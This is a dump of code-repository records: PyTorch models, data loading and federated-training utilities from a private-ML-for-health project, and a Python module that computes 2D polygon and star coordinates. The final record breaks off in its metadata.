"text": "import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nclass CNNMnistRelu(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\nclass CNNMnistTanh(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = torch.tanh(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = torch.tanh(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = torch.tanh(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\n\nclass CNNFashion_MnistRelu(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = F.relu(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = F.relu(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = F.relu(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\nclass CNNFashion_MnistTanh(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 16, 8, 2, padding=3)\n self.conv2 = nn.Conv2d(16, 32, 4, 2)\n self.fc1 = nn.Linear(32 * 4 * 4, 32)\n self.fc2 = nn.Linear(32, 10)\n\n def forward(self, x):\n # x of shape [B, 1, 28, 28]\n x = torch.tanh(self.conv1(x)) # -> [B, 16, 14, 14]\n x = F.max_pool2d(x, 2, 1) # -> [B, 16, 13, 13]\n x = torch.tanh(self.conv2(x)) # -> [B, 32, 5, 5]\n x = F.max_pool2d(x, 2, 1) # -> [B, 32, 4, 4]\n x = x.view(-1, 32 * 4 * 4) # -> [B, 512]\n x = torch.tanh(self.fc1(x)) # -> [B, 32]\n x = self.fc2(x) # -> [B, 10]\n return x\n\n def name(self):\n return \"SampleConvNet\"\n\nclass CNNCifar10Relu(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(32, 32, 5)\n self.fc1 = nn.Linear(32 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def forward(self, x):\n x = self.pool(F.relu(self.conv1(x)))\n x = self.pool(F.relu(self.conv2(x)))\n x = x.view(-1, 32 * 5 * 5)\n x = F.relu(self.fc1(x))\n x = F.relu(self.fc2(x))\n x = self.fc3(x)\n return F.log_softmax(x, dim=1)\n\nclass CNNCifar10Tanh(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(3, 32, 5)\n self.pool = nn.MaxPool2d(2, 2)\n self.conv2 = nn.Conv2d(32, 32, 5)\n self.fc1 = nn.Linear(32 * 5 * 5, 120)\n self.fc2 = nn.Linear(120, 84)\n self.fc3 = nn.Linear(84, 10)\n\n def forward(self, x):\n x = self.pool(torch.tanh(self.conv1(x)))\n x = self.pool(torch.tanh(self.conv2(x)))\n x = x.view(-1, 32 * 5 * 5)\n x = torch.tanh(self.fc1(x))\n x = torch.tanh(self.fc2(x))\n x = self.fc3(x)\n return F.log_softmax(x, dim=1)"
},
{
"alpha_fraction": 0.744303822517395,
"alphanum_fraction": 0.75443035364151,
"avg_line_length": 18.75,
"blob_id": "320e7ca40a5f87ebe7d0d8fe7bfea28d117c629b",
"content_id": "4054f0087d1a54580e0fce2f51f9f0e3a3bed4e9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 395,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 20,
"path": "/private_inference/app/README.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "# Private inference mobile app demo\n\nCode adapted from [this repo](https://github.com/avinassh/pytorch-flask-api-heroku)\n\n## Requirements\n\nInstall them from `requirements.txt`:\n\n pip install -r requirements.txt\n\n\n## Local Deployment\n\nRun the server:\n\n python app.py\n\nAnd then go to localhost:5000 in your browser.\n\nExample files that the demo will accept are in the example_inputs folder.\n"
},
{
"alpha_fraction": 0.4545454680919647,
"alphanum_fraction": 0.6753246784210205,
"avg_line_length": 14.399999618530273,
"blob_id": "9b3c6e5b2ea27c6494af0562be8d7469a1a9e836",
"content_id": "5b6c38cfc1f6abb840f83cdcfb59f92a11d0d301",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 18,
"num_lines": 5,
"path": "/private_inference/app/requirements.txt",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "gunicorn==20.0.4\nFlask==1.0.3\ntorchvision==0.2.1\nnumpy==1.16.4\nPillow==7.1.0\n"
},
{
"alpha_fraction": 0.5861960053443909,
"alphanum_fraction": 0.598802387714386,
"avg_line_length": 51.88333511352539,
"blob_id": "1e43729320b6d2b9f0f016dcf081fc065156607c",
"content_id": "c9a8e0c359d79adc39bb3c039186beab0258da13",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3173,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 60,
"path": "/private_training/src/options.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import argparse\n\ndef args_parser():\n parser = argparse.ArgumentParser()\n\n # federated arguments (Notation for the arguments followed from paper)\n parser.add_argument('--epochs', type=int, default=1,\n help=\"number of rounds of training\")\n parser.add_argument('--num_users', type=int, default=1,\n help=\"number of users: K\")\n parser.add_argument('--frac', type=float, default=1.,\n help='the fraction of clients')\n parser.add_argument('--local_ep', type=int, default=4,\n help=\"the number of local epochs: E\")\n parser.add_argument('--local_bs', type=int, default=50,\n help=\"local batch size: B\")\n\n # optimizer arguments\n parser.add_argument('--optimizer', type=str, default='sgd', help=\"type \\\n of optimizer\")\n parser.add_argument('--lr', type=float, default=0.01,\n help='learning rate')\n parser.add_argument('--momentum', type=float, default=0.9,\n help='SGD momentum (default: 0.0)')\n \n \n\n # model arguments\n parser.add_argument('--model', type=str, default='cnn', help='model name')\n parser.add_argument('--activation', type=str, default=\"relu\", help='activation')\n\n ## DP arguments\n parser.add_argument('--withDP', type=int, default=0, help='WithDP')\n parser.add_argument('--max_grad_norm', type=float, default=1.5, help='DP MAX_GRAD_NORM')\n parser.add_argument('--noise_multiplier', type=float, default=.75, help='DP NOISE_MULTIPLIER')\n parser.add_argument('--delta', type=float, default=.00001, help='DP DELTA')\n parser.add_argument('--virtual_batch_size', type=int, default=50, help='DP VIRTUAL_BATCH_SIZE')\n parser.add_argument('--sampling_prob', type=int, default=0.03425 , help='sampling_prob') \n\n # dataset arguments\n parser.add_argument('--dataset', type=str, default='mnist', help=\"name \\\n of dataset\")\n parser.add_argument('--num_classes', type=int, default=10, help=\"number \\\n of classes\")\n parser.add_argument('--gpu', default=None, help=\"To use cuda, set \\\n to a specific GPU ID. Default set to use CPU.\")\n parser.add_argument('--iid', type=int, default=1,\n help='Default set to IID. Set to 0 for non-IID.')\n parser.add_argument('--unequal', type=int, default=0,\n help='whether to use unequal data splits for \\\n non-i.i.d setting (use 0 for equal splits)')\n parser.add_argument('--sub_dataset_size', type=int, default=-1, help='To reduce original data to a smaller \\\n sized dataset. For experimental purposes.')\n parser.add_argument('--local_test_split', type=float, default=0., help='local_test_split') \n parser.add_argument('--dr_from_np', type=float, default=0, help='for diabetic_retinopathy dataset') \n parser.add_argument('--exp_name', type=str, default=\"exp_results\", help=\"The name of current experiment for logging.\")\n \n\n args = parser.parse_args()\n return args\n"
},
{
"alpha_fraction": 0.7928994297981262,
"alphanum_fraction": 0.7928994297981262,
"avg_line_length": 47.28571319580078,
"blob_id": "fa2a21e0785031938ff5c5c350bf6bfc655d6936",
"content_id": "da1f66ffa5b03aeceb7961771181446360110aaf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 338,
"license_type": "permissive",
"max_line_length": 185,
"num_lines": 7,
"path": "/video_demo/ReadME.md",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "## Demo Video\n\nThis folder contains a Proof-of-Concept video of the demo application the team has created. Given an image from the diabetic retinopathy dataset, it returns a diagnosis within seconds. \n\nThe demo is viewable at https://imperial-diagnostics.herokuapp.com.\n\nSource code is available in this repo, at `private_inference/app`.\n"
},
{
"alpha_fraction": 0.594694972038269,
"alphanum_fraction": 0.6015915274620056,
"avg_line_length": 29.901639938354492,
"blob_id": "0298cc73d8a75ac9c6dd4a8d289d48c6fc0a853c",
"content_id": "e4c5f3c977163d787a86f8388ccd0a3bea619f42",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1885,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 61,
"path": "/private_training/src_secure_aggregation/utils.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport copy\nimport torch\nfrom torchvision import datasets, transforms\nfrom sampling import dist_datasets_iid, dist_datasets_noniid\nfrom options import args_parser\nfrom torch import nn\nfrom torch.utils.data import DataLoader, Dataset\n\n\ndef test_inference(args, model, test_dataset):\n model.eval()\n loss, total, correct = 0.0, 0.0, 0.0\n device = 'cuda' if args.gpu else 'cpu'\n criterion = nn.NLLLoss().to(device)\n testloader = DataLoader(test_dataset, batch_size=128,\n shuffle=False)\n for batch_idx, (images, labels) in enumerate(testloader):\n images, labels = images.to(device), labels.to(device)\n # Inference\n outputs = model(images)\n batch_loss = criterion(outputs, labels)\n loss += batch_loss.item()\n # Prediction\n _, pred_labels = torch.max(outputs, 1)\n pred_labels = pred_labels.view(-1)\n correct += torch.sum(torch.eq(pred_labels, labels)).item()\n total += len(labels)\n\n accuracy = correct/total\n return accuracy, loss\n\n\ndef average_weights(w):\n \"\"\"\n Returns the average of the weights.\n \"\"\"\n w_avg = copy.deepcopy(w[0])\n for key in w_avg.keys():\n for i in range(1, len(w)):\n w_avg[key] += w[i][key]\n w_avg[key] = torch.div(w_avg[key], len(w))\n return w_avg\n\n\ndef exp_details(args):\n print('\\nExperimental details:')\n print(f' Model : {args.model}')\n print(f' Optimizer : {args.optimizer}')\n print(f' Learning : {args.lr}')\n print(f' Global Rounds : {args.epochs}\\n')\n\n print(' Federated parameters:')\n if args.iid:\n print(' IID')\n else:\n print(' Non-IID')\n print(f' Fraction of users : {args.frac}')\n print(f' Local Batch size : {args.local_bs}')\n print(f' Local Epochs : {args.local_ep}\\n')\n return\n"
},
{
"alpha_fraction": 0.5674195885658264,
"alphanum_fraction": 0.5854437351226807,
"avg_line_length": 41.55339813232422,
"blob_id": "577d2e807a40db90908b8157562995cbcec67ad3",
"content_id": "48ac85e2246cc23a09a4794b9fdabd02ba1c2c3a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4383,
"license_type": "permissive",
"max_line_length": 88,
"num_lines": 103,
"path": "/private_training/src_secure_aggregation/datasets_secure.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport copy\nimport torch\nfrom torchvision import datasets, transforms\nfrom sampling_secure import dist_datasets_iid, dist_datasets_noniid\nfrom options import args_parser\n\n\ndef get_train_dataset(args,rank):\n if args.dataset == 'cifar10' or args.dataset == 'cifar100':\n data_dir = './data/cifar/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n if args.dataset == 'cifar10':\n train_dataset = datasets.CIFAR10(data_dir, train=True, download=True,\n transform=apply_transform)\n elif args.dataset == 'cifar100':\n train_dataset = datasets.CIFAR100(data_dir, train=True, download=True,\n transform=apply_transform)\n elif args.dataset == 'mnist' or 'fmnist':\n if args.dataset == 'mnist':\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/mnist/'\n train_dataset = datasets.MNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n else:\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/fmnist/'\n train_dataset = datasets.FashionMNIST(data_dir, train=True, download=True,\n transform=apply_transform)\n\n if args.sub_dataset_size > 0:\n rnd_indices = np.random.RandomState(seed=0).permutation(len(train_dataset.data))\n train_dataset.data = train_dataset.data[rnd_indices]\n if torch.is_tensor(train_dataset.targets):\n train_dataset.targets = train_dataset.targets[rnd_indices]\n else:\n train_dataset.targets = torch.tensor(train_dataset.targets)[rnd_indices]\n train_dataset.data = train_dataset.data[:args.sub_dataset_size]\n train_dataset.targets = train_dataset.targets[:args.sub_dataset_size]\n print(\"\\nThe chosen sub dataset has the following shape:\")\n print(train_dataset.data.shape, train_dataset.targets.shape, \"\\n\")\n\n if args.iid:\n user_groups = dist_datasets_iid(train_dataset, args.num_users)\n else:\n user_groups = dist_datasets_noniid(train_dataset, args.num_users,\n num_shards=1000,unequal=args.unequal)\n\n data_ind = user_groups[rank-1]\n train_dataset = [train_dataset[int(i)] for i in data_ind]\n return(train_dataset, user_groups[rank-1])\n\ndef get_test_dataset(args):\n if args.dataset == 'cifar10' or args.dataset == 'cifar100':\n data_dir = './data/cifar/'\n apply_transform = transforms.Compose(\n [transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n if args.dataset == 'cifar10':\n test_dataset = datasets.CIFAR10(data_dir, train=False, download=True,\n transform = apply_transform)\n elif args.dataset == 'cifar100':\n test_dataset = datasets.CIFAR100(data_dir, train=False, download=True,\n transform = apply_transform)\n elif args.dataset == 'mnist' or 'fmnist':\n if args.dataset == 'mnist':\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/mnist/'\n test_dataset = datasets.MNIST(data_dir, train=False, download=True,\n transform=apply_transform)\n else:\n apply_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))])\n\n data_dir = './data/fmnist/'\n test_dataset = datasets.FashionMNIST(data_dir, train=False, download=True,\n transform = apply_transform)\n\n return(test_dataset)\n\n## For test\nif __name__ == '__main__':\n args = args_parser()\n rank=2\n train_dataset, user_groups = get_train_dataset(args,rank)\n test_dataset = get_test_dataset(args)\n print(train_dataset)\n print(test_dataset)\n print(np.unique([len(v) for k, v in user_groups.items()]))\n"
},
{
"alpha_fraction": 0.5274693369865417,
"alphanum_fraction": 0.5426651239395142,
"avg_line_length": 40.180721282958984,
"blob_id": "e03a2762ddb353ff088e0a7d919641f845e3cd57",
"content_id": "7d304eae29c0566129ed089e1ebf1760cd3c11bc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3422,
"license_type": "permissive",
"max_line_length": 100,
"num_lines": 83,
"path": "/private_training/src/sampling.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom torchvision import datasets, transforms\n\ndef dist_datasets_iid(dataset, num_users):\n num_items = int(len(dataset)/num_users)\n dict_users, all_idxs = {}, [i for i in range(len(dataset))]\n for i in range(num_users):\n dict_users[i] = set(np.random.RandomState(seed=i).choice(all_idxs, num_items,replace=False))\n all_idxs = list(set(all_idxs) - dict_users[i])\n\n if i%5000==0:\n print(i//5000)\n \n return dict_users\n\ndef dist_datasets_noniid(dataset, num_users, num_shards=None, num_imgs=None, \n unequal=0, min_shard = None, max_shard = None):\n \n if num_shards is None:\n num_shards = num_users\n if num_imgs is None:\n num_imgs = len(dataset)//num_shards\n assert num_shards//num_users > 0\n\n idx_shard = [i for i in range(num_shards)]\n dict_users = {i: np.array([]) for i in range(num_users)}\n idxs = np.arange(num_shards*num_imgs)\n labels = np.array(dataset.targets)\n\n # sort labels\n idxs_labels = np.vstack((idxs, labels))\n idxs_labels = idxs_labels[:, idxs_labels[1, :].argsort()]\n idxs = idxs_labels[0, :]\n\n if not unequal:\n random_shard_size = np.array([num_shards//num_users]*num_users)\n else: \n if min_shard is None:\n min_shard = min(1,(num_shards//num_users)-1)\n if max_shard is None:\n max_shard = (num_shards//num_users)+1\n # Divide the shards into random chunks for every client\n # s.t. the sum of these chunks = num_shards \n random_shard_size = np.random.RandomState(seed=0).randint(min_shard, max_shard+1,\n size=num_users) \n random_shard_size = np.around(random_shard_size /\n sum(random_shard_size) * num_shards)\n random_shard_size = random_shard_size.astype(int)\n diffs = sum(random_shard_size)-num_shards\n \n if diffs > 0:\n random_shard_size = np.sort(random_shard_size)[::-1]\n else:\n random_shard_size = np.sort(random_shard_size)\n for i in range(int(abs(diffs))):\n random_shard_size[i] -= np.sign(diffs)\n print(random_shard_size)\n for i in range(num_users):\n shard_size = random_shard_size[i]\n rand_set = set(np.random.RandomState(seed=i).choice(idx_shard, shard_size,replace=False))\n idx_shard = list(set(idx_shard) - rand_set)\n for rand in rand_set:\n dict_users[i] = np.concatenate((dict_users[i], \n idxs[rand*num_imgs:(rand+1)*num_imgs]),axis=0)\n if i%5000==0:\n print(i//5000)\n\n return dict_users\n\n## For test\nif __name__ == '__main__':\n dataset_train = datasets.MNIST('./data/mnist/',\n train=True, download=True,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,),\n (0.3081,))\n ]))\n\n # d = dist_datasets_iid(dataset_train, num_users)\n d = dist_datasets_noniid(dataset_train, num_users=50, unequal=1,\n num_shards=100, num_imgs=600, min_shard = 4, max_shard = 4)\n print(np.unique([len(v) for k, v in d.items()]))\n "
},
{
"alpha_fraction": 0.6694915294647217,
"alphanum_fraction": 0.6723163723945618,
"avg_line_length": 31.18181800842285,
"blob_id": "6e526d134180a1d436af62369fc64014f0fed11c",
"content_id": "14db44cd614daccc0211c38a80a8772fcd97dd46",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 354,
"license_type": "permissive",
"max_line_length": 80,
"num_lines": 11,
"path": "/private_inference/app/inference.py",
"repo_name": "BridgeYao2022/private-ml-for-health",
"src_encoding": "UTF-8",
"text": "from commons import get_model_from_global_agent\n\nd_r_class = [\"No DR\", \"Mild DR\", \"Moderate DR\", \"Severe DR\", \"Proliferative DR\"]\n\n\ndef get_prediction(input_tensor):\n model = get_model_from_global_agent()\n outputs = model.forward(input_tensor)\n _, y_hat = outputs.max(1)\n predicted_idx = int(y_hat.item())\n return d_r_class[predicted_idx]\n"
}
] | 24 |
Nick-Seinsche/Shapes2D
|
https://github.com/Nick-Seinsche/Shapes2D
|
c55a26989ece51062d6c0258d39622a8fe0ece76
|
ca447875ca2d57206582201a06ea7358ad3dd6eb
|
095ddf779a5cca58652b8b5fa24bd65c66f5435a
|
refs/heads/master
| 2022-09-01T05:54:26.618417 | 2019-03-15T14:29:06 | 2019-03-15T14:29:06 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.713178277015686,
"alphanum_fraction": 0.7209302186965942,
"avg_line_length": 15.125,
"blob_id": "63ef3de8823dfe0571e0e9587a239cef83708b14",
"content_id": "ec15440ccb4990b8a8e12ecfa0b0e9f18a6512dd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 129,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 8,
"path": "/README.md",
"repo_name": "Nick-Seinsche/Shapes2D",
"src_encoding": "UTF-8",
"text": "# Shapes2D\n\nUsage:\nExecute canvas.py\n\nW,A,S,D - Move the currently selected shape\n\nR - Rotate the currently selected shape\n"
},
{
"alpha_fraction": 0.49814125895500183,
"alphanum_fraction": 0.5630376935005188,
"avg_line_length": 32.50533676147461,
"blob_id": "2231e99a35224003b3991d1bbaf062dd211f21c4",
"content_id": "a9111027fcaf7fa7bfd1e0414eb754a0d820c4cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9415,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 281,
"path": "/polygon.py",
"repo_name": "Nick-Seinsche/Shapes2D",
"src_encoding": "UTF-8",
"text": "'''\n Title: polyon.py\n Description: Creates Coordinates for Polygons\n Author: Nick Seinsche\n Libaries:\n Standard Library\n Math\n'''\n\n# imports\nimport math\n\n# CONSTANTS\nPI = math.pi\nsin = lambda x: math.sin(x)\ncos = lambda x: math.cos(x)\n\n\ndef dist(p1: list, p2: list) -> float:\n '''\n Description:\n Returns the distance of two points\n Args:\n p1 (list) - n-dimensional coordinate\n p2 (list) - n-dimensional coordinate\n Returns:\n distance as a float\n Examples:\n >>> dist([1, 2], [3, 4])\n 2.8284271247461903\n >>> dist([1, 2, 3, 8], [3, 4, 16, -3])\n 17.26267650163207\n '''\n dtsq = [(p2[i] - p1[i])**2 for i in range(0, min(len(p1), len(p2)))]\n return math.sqrt(sum(dtsq))\n\n\ndef circle(x: float, y: float, radius: float):\n '''\n Description:\n calculates the coordinates of the outer points a circle bases on\n the angle (radiant)\n Args:\n x - the X-coordinate of the circle center\n y - the Y-coordinate of the circle center\n radius - the radius of the circle\n Returns:\n a lambda function that takes in the angle in radiants and returns\n a (x,y) tuple containing the coordinates of the circles outer point\n at the given angle\n Examples:\n >>> (circle(0,0,1))(0)\n (1.0, 0.0)\n >>> (circle(0,0,1))(pi)\n (-1.0, 1.2246467991473532e-16)\n '''\n return lambda a: (x + math.cos(a) * radius, y + math.sin(a) * radius)\n\n\ndef sphere(x: float, y: float, z: float, radius: float):\n '''\n Description:\n calculates the coordinates of the outer points a circle bases on\n the angle (radiant)\n Args:\n x - the X-coordinate of the spheres center\n y - the Y-coordinate of the spheres center\n z - the Z-coordinate of the spheres center\n radius - the radius of the sphere\n Returns:\n a lambda function that takes in the angle in radiants and returns\n a (a,b,c) tuple containing the coordinates of the circles outer point\n at the given angle\n Examples:\n >>> x(PI/4,PI/4)\n (0.5000000000000001, 0.5000000000000001, 0.7071067811865476)\n >>> x(PI/4,PI/3)\n (0.6123724356957946, 0.6123724356957946, 0.5000000000000001)\n '''\n return lambda s,t: (x + radius * cos(s) * sin(t),\n y + radius * sin(s) * sin(t),\n z + radius * cos(t))\n\n\ndef translate(origin: list, p3: list, p2: list) -> None:\n pass\n\n\nclass Shape:\n '''\n Description:\n Generic Class for Polygons\n Args:\n x - x-coordinate of shape\n y - y-coordinate of shape\n points - list of coordinate of points of the shape\n cirlce - instance of the circle function\n Methods:\n get() - returns the list of points\n __next__\n '''\n def __init__(self, x: float, y: float, size: float) -> None:\n self.x = x\n self.y = y\n self.points = []\n self.circle = circle(x, y, size)\n\n def update(self):\n print('no update funtion implemented')\n\n def rotate(self, angle: float, update=True) -> None:\n if not angle:\n if update:\n self.update()\n return\n self.rotAngle -= angle\n if update:\n self.update()\n\n def move(self, dx: float, dy: float, update=True) -> None:\n if not dx and not dy:\n if update:\n self.update()\n return\n for i in range(0, len(self.points)):\n self.points[i] = (self.points[i][0] + dx, self.points[i][1] + dy)\n self.x += dx\n self.y += dy\n if update:\n self.update()\n\n def get(self) -> list:\n return self.points\n\n def __iter__(self):\n return self\n\n def __next__(self) -> float:\n if self.next is None:\n self.next = 0\n self.next += 1\n return self.points[self.next-1]\n\n\nclass isoTriangle(Shape):\n '''\n Description:\n Class for an isosceles triangle. Calculates the three points of the\n triangle based on location, angle, size and rotation\n Args:\n x - x-coordinate of the top point of the triangle\n y - y-coordinate of the top point of the triangle\n innerAngle - the angle at the top point of the triangle (radiants)\n rotAngle - the angle the triangle is rotated (radiants)\n Methods:\n get() - inherited from Polygon\n Examples:\n >>> isoTriangle(0,0,1,3,0).get()\n (0, 0),\n (-1.4382766158126088, -2.6327476856711183),\n (1.4382766158126092, -2.632747685671118)\n '''\n def __init__(self, x: float, y: float, innerAngle: float,\n side_length: float, rotAngle: float) -> None:\n super().__init__(x, y, side_length)\n self.points.append((x, y))\n self.innerAngle = innerAngle\n self.side_length = side_length\n self.rotAngle = rotAngle\n self.points.append(self.circle(rotAngle + PI/2 - innerAngle/2))\n self.points.append(self.circle(rotAngle + PI/2 + innerAngle/2))\n\n def update(self) -> None:\n self.circle = circle(self.x, self.y, self.side_length)\n self.points[0] = (self.x, self.y)\n self.points[1] = self.circle(\n self.rotAngle + PI/2 - self.innerAngle/2)\n self.points[2] = self.circle(\n self.rotAngle + PI/2 + self.innerAngle/2)\n\n\nclass regPolygon(Shape):\n '''\n Description:\n Class for a regular polyon (a polygon where all sides have the same\n length and all inner angles are the same). Calculates the n points\n of the polygon based on location and rotation angle\n Args:\n x - x-coordinate of the center of the polygon\n y - y-coordinate of the center of the polygon\n n - number of sides the polyon should have\n rotAngle - the angle the polygon should be rotated by\n Methods:\n get() returns a list of 2-tuples of coordinates of the points\n update() updates the points\n rotate(float) rotates the polygon clockwiese for positive values\n move(float, float) adds the point to the position\n Examples:\n >>> regPolygon(0,0,3,1,0).get()\n [(-0.4999999999999992, 0.8660254037844392),\n (-0.5000000000000013, -0.8660254037844378),\n (1.0, -4.898587196589413e-16)]\n '''\n def __init__(self, x: float, y: float, size: float, rotAngle: float,\n n: int) -> None:\n super().__init__(x, y, size)\n self.n = n\n self.size = size\n self.rotAngle = rotAngle\n for i in range(0, n):\n self.points.append(self.circle(\n rotAngle - PI/2 + (i / n) * 2 * PI)\n )\n\n def update(self) -> None:\n self.circle = circle(self.x, self.y, self.size)\n for i in range(0, self.n):\n self.points[i] = self.circle(\n self.rotAngle - PI/2 + (i / self.n) * 2 * PI\n )\n\n\nclass regStar(Shape):\n '''\n Description:\n Calculates the points for a star with equal side length\n Args:\n x - x-coordinate of the stars center\n y - y-coordinate of the stars center\n size - the size of the body of the star\n rotAngle - the rotational angle (radiants)\n n - number of sides the star should have\n ratio - the ratio between the body and the legs\n Methods:\n get() returns a list of 2-tuples of coordinates of the points\n update() updates the points\n rotate(float) rotates the polygon clockwiese for positive values\n move(float, float) adds the point to the position\n Examples:\n >>> regStar(0, 0, 25, PI, 3, 1.8).get()\n [(2.7554552980815448e-15, 45.0), (2.7554552980815448e-15, 45.0),\n (-38.97114317029975, -22.499999999999986), (-38.97114317029975,\n -22.499999999999986), (38.971143170299726, -22.50000000000002),\n (38.971143170299726, -22.50000000000002)]\n '''\n def __init__(self, x: float, y: float, size: float, rotAngle: float,\n n: int, ratio: float) -> None:\n super().__init__(x, y, size)\n self.x_new = self.x\n self.y_new = self.y\n self.size = size\n self.rotAngle = rotAngle\n self.n = n\n self.ratio = ratio\n self.poly = regPolygon(x, y, size, rotAngle, n)\n self.big_poly = regPolygon(x, y, size * ratio, rotAngle - PI / n, n)\n for i in range(0, 2 * len(self.poly.points)):\n if i % 2 == 0:\n self.points.append(self.big_poly.points[int(i / 2)])\n elif i % 2 == 1:\n self.points.append(self.big_poly.points[int((i - 1) / 2)])\n\n def update(self) -> None:\n self.points = []\n self.poly = regPolygon(self.x, self.y, self.size,\n self.rotAngle - PI/self.n, self.n)\n self.big_poly = regPolygon(self.x, self.y, self.size*self.ratio,\n self.rotAngle, self.n)\n for i in range(0, 2 * len(self.poly.points)):\n if i % 2 == 0:\n self.points.append(self.poly.points[int(i / 2)])\n elif i % 2 == 1:\n self.points.append(self.big_poly.points[int((i - 1) / 2)])\n\n\nif __name__ == \"__main__\":\n # print(regStar(0, 0, 25, PI, 3, 1.8).get())\n # print(dist([1, 2, 3, 8], [3, 4, 16, -3]))\n sp = sphere(0,0,0,1)\n print(sp(PI/2,0))\n pass\n"
},
{
"alpha_fraction": 0.5654237270355225,
"alphanum_fraction": 0.5932203531265259,
"avg_line_length": 29.412370681762695,
"blob_id": "b3b2afb9e04548361918fbec7d148b816792a086",
"content_id": "ddecbe9c0f00a6dcfb9085ae9d5077bf7938aa74",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2950,
"license_type": "no_license",
"max_line_length": 77,
